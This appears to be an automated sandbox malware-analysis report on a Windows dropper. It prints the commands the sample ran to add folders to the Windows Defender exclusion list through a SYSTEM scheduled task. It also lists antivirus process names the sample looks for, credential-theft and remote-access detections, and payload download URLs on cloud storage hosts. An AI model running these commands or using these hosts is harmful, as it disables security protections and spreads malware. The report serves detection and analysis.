              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF9FD40 cpuid 7_2_00007FF8FDF9FD40
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: GetLocaleInfoA,7_2_000000014000F370
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCode function: GetLocaleInfoA,44_2_00636B1A
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_000000014000A370
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_0000000140005A70
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: byHW9q.exe, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360safe.exe
              Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
              Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
              Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
              Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 42.2.byHW9q.exe.3b703e8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 42.2.byHW9q.exe.3b703e8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 42.2.byHW9q.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 42.2.byHW9q.exe.3b703e8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 42.2.byHW9q.exe.3b703e8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 42.2.byHW9q.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTR
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,7_2_00000001400042B0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,7_2_0000000140003F80
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              1
              Disable or Modify Tools
              1
              Credential API Hooking
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts113
              Command and Scripting Interpreter
              33
              Windows Service
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              LSASS Memory4
              File and Directory Discovery
              Remote Desktop Protocol1
              Credential API Hooking
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Scheduled Task/Job
              11
              Scheduled Task/Job
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              Security Account Manager223
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts12
              Service Execution
              1
              Registry Run Keys / Startup Folder
              33
              Windows Service
              1
              Software Packing
              NTDS431
              Security Software Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets1
              Process Discovery
              SSHKeylogging3
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
              Scheduled Task/Job
              32
              Masquerading
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder
              1
              Modify Registry
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588718 Sample: 2976587-987347589.08.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 75 sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 2->75 77 sc-2ixf.cn-beijing.oss-adns.aliyuncs.com 2->77 79 5 other IPs or domains 2->79 87 Suricata IDS alerts for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for dropped file 2->91 93 10 other signatures 2->93 9 XY3LL0.exe 25 2->9         started        14 2976587-987347589.08.exe 1 24 2->14         started        16 XY3LL0.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 83 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49981, 49982 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->83 63 C:\Program Files (x86)\byHW9q\tbcore3U.dll, PE32 9->63 dropped 65 C:\Program Files (x86)\byHW9q\byHW9q.exe, PE32 9->65 dropped 67 C:\Users\Public\Music\destopbak.ini, MIPSEB 9->67 dropped 107 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->107 109 Found direct / indirect Syscall (likely to bypass EDR) 9->109 20 byHW9q.exe 4 5 9->20         started        25 cmd.exe 1 9->25         started        27 cmd.exe 1 9->27         started        35 2 other processes 9->35 85 sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.105, 443, 49973, 49974 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->85 69 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->69 dropped 71 C:\Users\user\Documents\vselog.dll, PE32+ 14->71 dropped 73 C:\Users\user\Documents\XY3LL0.exe, PE32+ 14->73 dropped 111 Drops PE files to the document folder of the user 14->111 113 Sample is not signed and drops a device driver 14->113 115 Tries to detect virtualization through RDTSC time measurements 14->115 117 Uses cmd line tools excessively to alter registry or file data 18->117 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 81 8.217.47.169, 49987, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->81 59 C:\Program Files (x86)\x736Pg9\tbcore3U.dll, PE32 20->59 dropped 61 C:\Program Files (x86)\x736Pg9\QmbK8U.exe, PE32 20->61 dropped 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->95 97 Creates an undocumented autostart registry key 20->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->99 39 cmd.exe 20->39         started        101 Uses cmd line tools excessively to alter registry or file data 25->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 25->103 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        51 2 other processes 25->51 45 conhost.exe 27->45         started        53 3 other processes 27->53 105 Adds extensions / path to Windows Defender exclusion list (Registry) 29->105 47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        55 6 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              2976587-987347589.08.exe17%VirustotalBrowse
              2976587-987347589.08.exe5%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\byHW9q\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\x736Pg9\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\byHW9q\tbcore3U.dll100%Joe Sandbox ML
              C:\Program Files (x86)\x736Pg9\tbcore3U.dll100%Joe Sandbox ML
              C:\Program Files (x86)\byHW9q\byHW9q.exe0%ReversingLabs
              C:\Program Files (x86)\x736Pg9\QmbK8U.exe0%ReversingLabs
              C:\Program Files (x86)\x736Pg9\tbcore3U.dll78%ReversingLabsWin32.Adware.RedCap
              C:\Users\Public\Music\destopbak.ini0%ReversingLabs
              C:\Users\user\Documents\XY3LL0.exe0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://662hfg.oss-cn-beijing.aliyuncs.com/Y5O;0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifhttps://662hfg.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif$0%Avira URL Cloudsafe
              http://%s/%d.dll0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif$0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
              http://%s/%d.dllC:0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat(0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/v0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
              http://%s/ip.txtC:0%Avira URL Cloudsafe
              http://%s/upx.rarC:0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/j0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/A50%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/A50%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifp0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifl0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003q5W;0%Avira URL Cloudsafe
              http://%s/upx.rar0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifi0%Avira URL Cloudsafe
              https://662hfg.oss-cn-beijing.aliyuncs.com/pV0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
              118.178.60.9
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
                  39.103.20.105
                  truefalse
                    unknown
                    cvqthu.net
                    unknown
                    unknownfalse
                      unknown
                      662hfg.oss-cn-beijing.aliyuncs.com
                      unknown
                      unknownfalse
                        unknown
                        22mm.oss-cn-hangzhou.aliyuncs.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://662hfg.oss-cn-beijing.aliyuncs.com/b.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://662hfg.oss-cn-beijing.aliyuncs.com/s.datfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://662hfg.oss-cn-beijing.aliyuncs.com/i.datfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://662hfg.oss-cn-beijing.aliyuncs.com/c.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                            high
                            https://662hfg.oss-cn-beijing.aliyuncs.com/d.giffalse
                            • Avira URL Cloud: safe
                            unknown
                            https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                              high
                              https://662hfg.oss-cn-beijing.aliyuncs.com/a.giffalse
                              • Avira URL Cloud: safe
                              unknown
                              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                                high
                                https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://662hfg.oss-cn-beijing.aliyuncs.com/Y5O;2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif$2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifhttps://662hfg.oss-cn-beijing.aliyuncs.com/b.gifhttp2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://%s/%d.dllbyHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
